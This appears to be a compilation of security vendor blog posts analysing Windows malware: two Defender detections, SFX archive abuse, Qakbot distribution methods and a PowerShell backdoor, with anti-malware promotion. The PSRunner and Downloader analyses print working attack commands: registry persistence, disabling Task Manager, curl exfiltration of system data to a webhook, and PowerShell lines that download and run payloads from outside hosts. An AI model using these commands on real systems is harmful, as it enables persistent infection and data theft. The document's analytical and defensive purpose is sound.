Trojan:BAT/PSRunner.VS!MSR Overview

Trojan:BAT/PSRunner.VS!MSR is a type of malware detection identifier used by Microsoft Defender antivirus. This heuristic detection applies to batch files (.bat), which are scripts that can execute a series of commands in Windows via PowerShell. Typically, it downloads and executes additional malicious software, making it a simplified version of a dropper. Although less flexible, PSRunner is still capable of making quite a mess in the system.

Typically, it is spread through email attachments in phishing campaigns. This is the most popular tactic, where emails appear to come from legitimate sources, prompting recipients to open the attachment or click on malicious links. Additionally, the trojan can be downloaded from pirate or malicious websites in the form of cheats and mods for games. In that case, the disguise is not an attachment, but the entire game installer that serves a shell around the malignant script.

Technical Analysis

Let’s delve deeper into how Trojan:BAT/PSRunner.VS!MSR behaves after it infiltrates a system. As a .bat file, it lacks advanced features like sandbox or debugger checks. However, it still attempts to operate as stealthily as possible to avoid detection by the user. Upon execution, it hides itself from the PowerShell window using the following command:

attrib +h +s %0

Persistence

Next, the malware takes steps to establish persistence in the system. It executes the following commands:

set valinf="rundll32_%randoM%_toolbar"
set reginf="hklm\Software\Microsoft\Windows\CurrentVersion\Run"
reg add %rEgINf% /v %VaLinf% /t "REG_SZ" /d %0 /f > nul
copy %0 "%uSERPROFILE%\Start Menu\Programs\Startup"
echo start "" %0>>%SystemDrive%\auTOexec.baT
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v AVAADA /t REG_SZ /d %WINDir%\%a%.bat /f > nul

By doing this, the malicious script creates multiple registry entries, enabling it to run at every system startup. Additionally, it copies the script to the user’s Startup folder to ensure it launches upon system login.

As mentioned earlier, this is simply a script using PowerShell. Unlike more advanced malware, it cannot hide in the Task Manager. This means the user can terminate the process by ending the PowerShell process in the Task Manager. Therefore, the malware’s next step is to disable the Task Manager. It adds the following registry key:

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f >nul

Gathering Information

Next, the malware collects various information about the system. This process is often referred to as system fingerprinting. In this case, the fingerprint is quite detailed. The malware executes the following command:

powershell -Command "Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table >%usErPrOfiLE%\apps.txt"
curl -v -F "chat_id=-655682538" -F document=@%uSERPRoFILE%\apps.txt %WEbHooK%

This command saves a list of installed applications to a text file named apps.txt and sends it to a remote server. The script then gathers system information into a file named userdata.txt using the following commands:

echo Username %usERnAME% >> userdata.txt
echo IP %IPV4% >> userdata.txt
echo. >> userdata.txt
ipconfig >> userdata.txt
echo. >> userdata.txt
getmac >> userdata.txt
echo. >> userdata.txt
wmic cpu get caption name, deviceid, numberofcores maxclockspeed, status >> userdata.txt
echo. >> userdata.txt
wmic computersystem get totalphysicalmemory >> userdata.txt
echo. >> userdata.txt
wmic partition get name,size,type >> userdata.txt
echo. >> userdata.txt
systeminfo >> userdata.txt
echo. >> userdata.txt
wmic path softwareLicensingService get OA3xOriginalProductKey >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt
echo. >> userdata.txt

After gathering this information, it sends the file to a remote server with the following command:

cu rl -v -F "chat_id=-655682538" -F document=@%useRpRofIlE%\userdata.txt %WEBHOOk%
del userdata.txt
del apps.txt

By doing this, the malware retrieves and transmits extensive system details, including installed applications, network configurations, hardware specifications, and system information. Finally, it deletes the files userdata.txt and apps.txt to cover its tracks.

Payload

The final stage of the script’s execution involves running the following command:

powershell -Command "(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe', 'GetToken.exe') "
start GetToken.exe
ping 127.0.0.1 3 > "e.txt"
start GetToken.exe

As we can see, the script uses PowerShell to download an executable file named GetToken.exe from Discord servers and then runs it. All the naming of the involved files are made to create the least suspicion.

How To Remove Trojan:BAT/PSRunner.VS!MSR?

To remove Trojan:BAT/PSRunner.VS!MSR, you need to use an advanced anti-malware solution with a heuristic module. Additionally, it is crucial to maintain continuous system protection to prevent future infections. GridinSoft Anti-Malware is an excellent choice because, in addition to proactive protection, it has an Internet Security module. This will block potentially unsafe sites, thus preventing the infection process at the earliest stage.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:BAT/PSRunner.VS!MSR appeared first on Gridinsoft Blog.

Trojan:Script/Downloader!MSR Overview

Trojan:Script/Downloader!MSR is a heuristic detection of Microsoft Defender that flags a small malware downloading script. Unlike a full-fledged dropper, this malicious thing is in fact disposable: it never runs again after execution. This loader executes a selection of commands in PowerShell or Command Prompt, which triggers Microsoft Defender. But since this detection is heuristic, and malicious activity comes from the activity within the PS environment, the built-in antivirus says that the powershell.exe is in question.

Trojan:Script/Downloader!MSR is typically spread through common malware methods such as game mods, pirated games, software, activators (KMS), and keygens. It is also distributed under the guise of legitimate files, masked with double extension and an altered file icon. As for the payload, Trojan:Script/Downloader!MSR most often delivers spyware, remote administrative tools, and ransomware.

Technical Analysis

Let’s get into Trojan:Script/Downloader!MSR operations on the target system by analysing the scripts this malware may use. By its nature, it does not perform any checks for the presence of a sandbox. Instead, it immediately executes its function—dropping the payload:

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue' -ScriptBlock { (New-Object System.Net.WebClient).DownloadFile('http://5.252.161.59:8880/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe' }

As we can see, the malicious script uses PowerShell to download and execute a malicious file. It employs the ExecutionPolicy Bypass parameter to run the script without security restrictions. -NoExit makes the console window persistent, i.e. it does not close once the command execution is over, so the script can execute other commands. It also uses -WindowStyle Hidden to hide the PowerShell window, so the user does not notice its execution. Next, the Start-Process command ‘C:\\test-MDATP-test\\invoice.exe’} executes the downloaded file.

Basic Code Obfuscation

Although this is a fairly primitive loader script, some obfuscation may be used to make the detection harder. Below, you can see one of the intermediary commands that the script can execute to add a specific registry key. This key may further be a foothold for the malware the script will deploy, for gaining persistence or storing valuable data.

reg.exe add "HKEY_CURRENT_USER\Software\Classes\AppProgram" /v ART /t REG_SZ /d "U2V0LUNvbnRlbnQgLXBhdGggIiRlbnY6U3lzdGVtUm9vdC9UZW1wL2FydC1tYXJrZXIudHh0IiAtdmFsdWUgIkhlbGxvIGZyb20gdGhlIEF0b21pYyBSZWQgVGVhbSI=" /f
iex ([Text.Encoding]::ASCII.GetString([Convert]::FromBase64String((gp 'HKCU:\Software\Classes\AtomicRedTeam').ART)))

This way, the malware adds a new registry key and sets its value to a base64-encoded string. The base64-encoded shell code looks like this:

powershell.exe -e #{JgAgACgAZwBjAG0AIAAoACcAaQBlAHsAMAB9ACcAIAAtAGYAIAAnAHgAJwApACkAIAAoACIAVwByACIAKwAiAGkAdAAiACsAIgBlAC0ASAAiACsAIgBvAHMAdAAgACcASAAiACsAIgBlAGwAIgArACIAbABvACwAIABmAHIAIgArACIAbwBtACAAUAAiACsAIgBvAHcAIgArACIAZQByAFMAIgArACIAaAAiACsAIgBlAGwAbAAhACcAIgApAA==}

Even though the malware has an encryption key, the obfuscation makes it harder to detect.

Is Trojan:Script/Downloader!MSR a False Positive?

Sometimes, Trojan:Script/Downloader!MSR can be detected by antivirus software as a false positive. This mostly occurs when a program lacks a valid certificate and accesses the internet. In some cases, detection happens when the program contacts suspicious IP addresses. Regardless, it is always essential to check such detections to rule out any real threats.

For these purposes, I recommend using GridinSoft Anti-Malware. In addition to scanning and cleaning your system, it provides proactive device protection and Internet Security, which will prevent threats even at the download stage.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Script/Downloader!MSR appeared first on Gridinsoft Blog.

CrowdStrike warns that hackers are adding malicious functionality to self-extracting SFX archives containing harmless honeypot files that can launch PowerShell.

This simple trick allows attackers to plant backdoors on victims’ machines without raising an “alarm”.

Let me remind you that we also wrote that Attackers target .NET Developers with Malicious NuGet Packages, and also that Hackers compromised Slack private GitHub repositories.

Also information security specialists warned that Hackers bypass ransomware protection using WinRAR.

The researchers remind that self-extracting archives created with archivers such as WinRAR and 7-Zip are, in fact, executable files that contain archive data along with built-in unpacking functionality.

Access to such files may be password protected to prevent unauthorized access. SFX files were originally created to make it easier to distribute data to users who don’t have a decompressor.

Password protected SFX file

Recently, Crowdstrike experts discovered an attacker who used stolen credentials to abuse utilman.exe (an accessibility application that can be run before a user logs in) and configured it to run a password-protected SFX file that was previously placed on the system.

The SFX file launched by utilman.exe was password protected and contained an empty text file that acted as a decoy. The real purpose of the archive was to run PowerShell, the Windows command line (cmd.exe) and the “Task Manager” with system privileges.

Further analysis of the threat showed that the attacker added several commands at once, which were run after the target unpacked the archived text file.

As you can see in the screenshot above, the attacker configured the SFX archive in such a way that no dialog boxes were displayed during the extraction process. He also added instructions for launching PowerShell, Command Prompt, and Task Manager.

The fact is that WinRAR offers a set of advanced settings for SFX, which allow adding a list of executable files to be automatically launched before or after the unpacking process, as well as overwrite existing files in the destination folder if files with the same name already exist.

The researchers remind that users should pay special attention to self-extracting archives and use the appropriate software to check their contents and look for potential scripts and commands scheduled to run on extraction.

The post SFX Archives Can Sneakily Launch PowerShell appeared first on Gridinsoft Blog.

What is Qbot?

Before moving on to distribution methods, let’s recap QakBot. Qakbot Malware (QuakBot, or QBot) is a banking Trojan designed to steal confidential information from Windows computers. For starters, it is worth mentioning that this type of malware is nothing new, and it appeared in 2007. Since then, it has undergone many changes, primarily aimed at bypassing security features. What has stayed the same, however, is the distribution method. For the most part, it’s email spam. However, after infecting one machine, QakBot can spread to other devices on the network.

Furthermore, it has modular protection. Hence, the operator can fully customize it according to the objectives. For example, it can be network reconnaissance, keylogging, credential theft, botnet deployment, or ransomware. In some cases, botnets under the rule of QakBot were delivering CobaltStrike beacons.

Distribution using OneNote Using Batch & PowerShell

The primary method of spreading Qakbot is through e-mail spamming. Previously, a rogue email contained an MS Office file with a malicious macro hidden inside. However, after Microsoft forcibly disabled the execution of any macros coming from the Internet, Qakbot started attaching the OneNote attachment. Usually, such an email contains something like “RE: DRCP Hire-Success Story…” and attachments are usually masked as legitimate files and named, for example, “Contracts – Copy.one”.

A fake cloud attachment page opens when the victim opens the OneNote attachment. This is done to get the victim to click on the BAT file (let’s call it Open.bat) that is embedded in Contracts – Copy.one. A PowerShell script is started as soon as the user runs this file, which in turn puts a CMD file with the conditional name “i.cmd” into the %temp% folder and runs it. This action is performed in a mode hidden from the user and not displaying any notifications. It then uses a PowerShell script to download a GIF file using the Invoke-Webrequest command. Although this file is saved as a JPG file in %programdata%, it has nothing to do with image files. Instead, it is an executable Qakbot DLL file that Rundll32.exe runs with the “Wind” parameter.

Distribution Via OneNote Using Jscript (.jse) file

Similarly to the previous point, the initial stage of the infection process occurs via phishing emails, which also contain a OneNote attachment. However, unlike the last end, this attachment includes a JSE file. This file also contains a hidden Bat file, usually disguised as an “Open” button. After the user clicks this button, the batch file is launched. PowerShell script downloads the pseudo-gif file into a Temp system folder. This file is also different from what it looks like. It is an executable Qakbot DLL file which performs the routine unfolding process, same as in any other case scenario.

Distribution using html Application (.hta) file

At the end of January 2023, Qakbot operators began experimenting with this new distribution method. It is identical to the previous way, except that instead of a JSE file, OneNote files contain an embedded HTML application (HTA file). When the user clicks “open” on the OneNote page, it drops an embedded .hta file executed by mshta.exe in the background. The script in the HTA file uses the legitimate curl.exe application to load the Qakbot DLL file into the C:\ProgramData folder and then run it. The Qakbot payload is injected into the Windows Auxiliary Technology Manager “AtBroker.exe” to hide its presence.

Distribution using Windows Script (.wsf) Files

In this case, the phishing email contains an attachment in the form of a zip file with a random name, e.g., “Shared Document From Cloud 540318.zip”. There may be several files in the archive, including a wsf file. This file contains malicious JScript between digital certificates. Hence when a victim tries to open the .wsf file, it will run code to download the Qakbot DLL file. Usually, it is loaded in the C:\ProgramData directory and run using “Rundll32.exe” with the parameter “Wind”.

Distribution using Google Ads

Since Microsoft, by default, blocks macros execution in Office files downloaded from the Internet, attackers are finding ever more sophisticated ways to distribute malware. Thus lately, there has been a significant surge in malicious ads that lead to a fake page of a legitimate program. Thus lately, there has been a significant surge in malicious advertising, which leads to a fake page of a legitimate program. However, instead of the legitimate program, the user receives malware. It may usually be a .exe or .msi file, which contains malware and many empty sections to avoid detection by anti-malware engine, as it overwhelms their file size limit.

How to avoid Qakbot Malware infection

To minimize the risk of Qakbot Malware infection, we recommend following cyber hygiene practices and the recommendations below:

• Be careful when dealing with email. Please do not open emails from unknown or unverified senders.
• Avoid downloading pirated software from unverified sites like Torrent/Warez. Most often, pirated software contains unpleasant bonuses in the form of Trojans or ransomware.
• Use strong passwords, update them regularly, and use multifactor authentication wherever possible. Passwords that are too easy can be compromised by brute force. Multifactor authentication can protect passwords if data breaches have compromised them.
• Use a strong security solution on all devices, including PCs, laptops, and mobile devices.
• Include data loss prevention (DLP) solutions on employee systems.

Conclusion

The Qakbot malware provides a prime example of how the threat landscape is changing. Its complex structure, impact, and distribution underscore the importance of maintaining cybersecurity vigilance. Moreover, as discussed at the outset, attackers using Qakbot consistently adapt their methods, using innovative attack vectors such as OneNote and Google Ads attachments to avoid detection, reinforcing the need for proactive and robust security measures.

The post Qakbot Malware Applies New Distribution Methods appeared first on Gridinsoft Blog.

Let me remind you that we also wrote that Germans Interested in the Situation in Ukraine Are Attacked by the PowerShell RAT Malware.

The backdoor spreads through spear phishing, as part of malicious Word documents that are usually disguised as job offers. When such a document is opened, a macro is triggered within it that delivers the updater.vbs PowerShell script to the victim’s computer, which creates a scheduled task claiming to be part of a Windows update.

Bait from hacker’s letter

The VBS script executes two other PowerShell scripts (Script.ps1 and Temp.ps1), which are stored obfuscated inside the malicious document itself. When SafeBreach analysts first discovered these scripts, none of the products featured on VirusTotal identified them as malicious.

Script.ps1 connects to the C&C servers of the attackers, sends the victim ID to its operators, and then waits for further commands, which it receives in encrypted form (AES-256 CBC). Based on the count of such identifiers, the analysts could conclude that about 69 victims were registered on the attackers’ control servers, which probably corresponds to the approximate number of hacked computers.

The Temp.ps1 script, in turn, decodes the commands received from the server as a response, executes them, and then encrypts and uploads the result via a POST request to the control server.

The experts created a script that deciphered the commands of the malware operators, and found that two-thirds of them were intended to steal data, and the rest were used to compile lists of users, files, delete files and accounts, and also compile lists of RDP clients.

Researchers believe that this PowerShell backdoor seems to be created by some previously unknown attackers, and so far there is too little data to talk about the attribution of these attacks.

The post New PowerShell Backdoor Masquerades as a Windows Update appeared first on Gridinsoft Blog.